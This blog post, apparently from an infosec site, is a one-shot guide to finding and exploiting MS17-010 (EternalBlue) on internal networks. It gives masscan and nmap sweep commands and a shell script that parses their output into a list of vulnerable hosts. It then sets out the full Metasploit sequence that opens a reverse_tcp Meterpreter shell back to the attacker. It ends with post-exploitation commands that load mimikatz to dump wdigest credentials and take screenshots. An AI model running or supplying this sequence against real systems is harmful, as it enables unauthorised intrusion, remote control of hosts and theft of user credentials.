Neurohazard

MS17-010: a one-shot scan-and-exploit guide for internal networks

wpadmin · February 22, 2019 · InfoSec


Reconnaissance

References
https://masterxsec.github.io/2017/05/27/Metasploit%E4%B8%AD%E7%9A%84MS17-010/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

Other exploits
https://github.com/jflyup/goMS17-010

Metasploit's own scanner module can also be used for the check: auxiliary/scanner/smb/smb_ms17_010

sudo masscan -p445 192.168.1.1/16 > 445_open.txt
# masscan prints one "Discovered open port 445/tcp on <ip>" line per hit;
# strip everything before the IP so the file can be fed to nmap -iL
# (the original did this by hand in vi with a block-select and delete)
sed -i 's/.* //' 445_open.txt
# -p445 stops nmap from port-scanning every host before the script runs
nmap --script "smb-vuln-ms17*" -Pn -p445 -iL 445_open.txt > 17010.txt
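The sweep above hands the masscan hit list to nmap and then leaves you to read 17010.txt by eye. The following shell script is an added example, not code from the original post: it parses masscan's stdout into a target list and pulls out of nmap's normal output only the hosts whose smb-vuln-ms17-010 block reached "State: VULNERABLE", so they can go straight into the Metasploit step. The masscan and nmap output embedded below is constructed sample data, and the function names are my own; nothing in this block touches the network.

```shell
#!/bin/sh
# Added example (not part of the original post): glue for the masscan -> nmap
# sweep. It only parses output; the constructed samples below stand in for real
# masscan and nmap runs so the script works offline.

# masscan's default stdout line: "Discovered open port 445/tcp on 192.168.1.10".
# Print the unique IP column, one per line, ready for nmap -iL.
masscan_ips() {
    awk '/^Discovered open port [0-9]+\/tcp on / { print $NF }' "$@" | sort -u
}

# Parse nmap normal output (stdout or -oN) and print hosts whose
# smb-vuln-ms17-010 block reached "State: VULNERABLE". Script headers look like
# "| name:" or "|_name:" (one optional space); continuation lines are indented
# further, so the in_ms17 flag tracks which script the State line belongs to and
# a VULNERABLE state from some other smb-vuln-* script is not counted.
ms17_vulnerable_hosts() {
    awk '
        /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host); in_ms17 = 0; next }
        /^\|_? ?smb-vuln-ms17-010:/ { in_ms17 = 1; next }
        /^\|_? ?[a-z0-9-]+:/        { in_ms17 = 0; next }
        in_ms17 && /State: VULNERABLE/ { print host }
    ' "$@" | sort -u
}

# Constructed sample: masscan output with one host reported twice.
MASSCAN_SAMPLE='Discovered open port 445/tcp on 192.168.1.10
Discovered open port 445/tcp on 192.168.1.22
Discovered open port 445/tcp on 192.168.1.10'

# Constructed sample: nmap output for three hosts. The first and third are
# MS17-010 vulnerable; the second only has a VULNERABLE state from another script.
NMAP_SAMPLE='Nmap scan report for 192.168.1.10
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH

Nmap scan report for 192.168.1.22
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|_    State: VULNERABLE

Nmap scan report for dc01.corp.local (10.0.0.5)
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|_    State: VULNERABLE'

demo_masscan_ips() { printf '%s\n' "$MASSCAN_SAMPLE" | masscan_ips; }
demo_ms17_hosts()  { printf '%s\n' "$NMAP_SAMPLE" | ms17_vulnerable_hosts; }

# Real run (not executed here): same functions on the files the sweep produces.
#   sudo masscan -p445 192.168.1.1/16 > 445_open.txt
#   masscan_ips 445_open.txt > targets.txt
#   nmap -Pn -n -p445 --script smb-vuln-ms17-010 -iL targets.txt -oN 17010.txt
#   ms17_vulnerable_hosts 17010.txt

echo "targets from masscan:"; demo_masscan_ips
echo "MS17-010 vulnerable:";  demo_ms17_hosts
```

Both functions read files given as arguments or stdin, so they drop into a pipeline as easily as they run on saved output. The hostname case (dc01.corp.local) shows why the parser takes the last field and strips parentheses rather than assuming the report line ends in a bare IP.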

Exploitation

msfconsole

use exploit/windows/smb/ms17_010_eternalblue
show targets
set TARGET <target-id>
show options
# the payload architecture must match the target you selected
set payload windows/x64/meterpreter/reverse_tcp
# for a 32-bit target instead:
# set payload windows/meterpreter/reverse_tcp
set RHOST <remote_host>
# your own address on the internal network, where the reverse shell connects back
set LHOST <local_ip>
options
exploit

Nmap

Compilation

Compiling Nmap from source

$ sudo apt-get install git wget build-essential checkinstall libpcre3-dev libssl-dev clang
$ git clone https://github.com/nmap/nmap.git
$ cd nmap && ./configure && make && sudo make install

Nmap and MS17-010

nmap 192.168.1.1 --script smb-vuln-ms17-010
# smb-vuln-ms17-010 is a port script bound to 445/139; with -sn (no port scan)
# it would never run, so restrict the ports instead of skipping the scan
nmap 192.168.1.1 -Pn -p445 --script smb-vuln-ms17-010
nmap -iL list.txt -Pn -p445 --script smb-vuln-ms17-010
nmap --script "smb-vuln-ms17*" -Pn -p445 -iL 445_open.txt > 17010.txt
# Windows host: write XML results to d:\out.xml
nmap --script smb-vuln-ms17-010.nse -n -p445 --open -oX d:\\out.xml 192.168.0.1/16

# limiting the scan to -p445,139 speeds it up considerably
nmap --script smb-vuln-ms17-010.nse -n -p445,139 -oX out.xml 192.168.0.1/16

Installing Metasploit on Ubuntu

https://www.darkoperator.com/installing-metasploit-in-ubunt/

# proxychains4 is only needed when apt has to reach the repositories through a proxy
sudo proxychains4 apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev

Meterpreter

meterpreter >
# the mimikatz extension needs a SYSTEM session whose architecture matches the
# target (EternalBlue gives SYSTEM); on current Metasploit use: load kiwi / creds_wdigest
load mimikatz
wdigest
screenshot
sysinfo
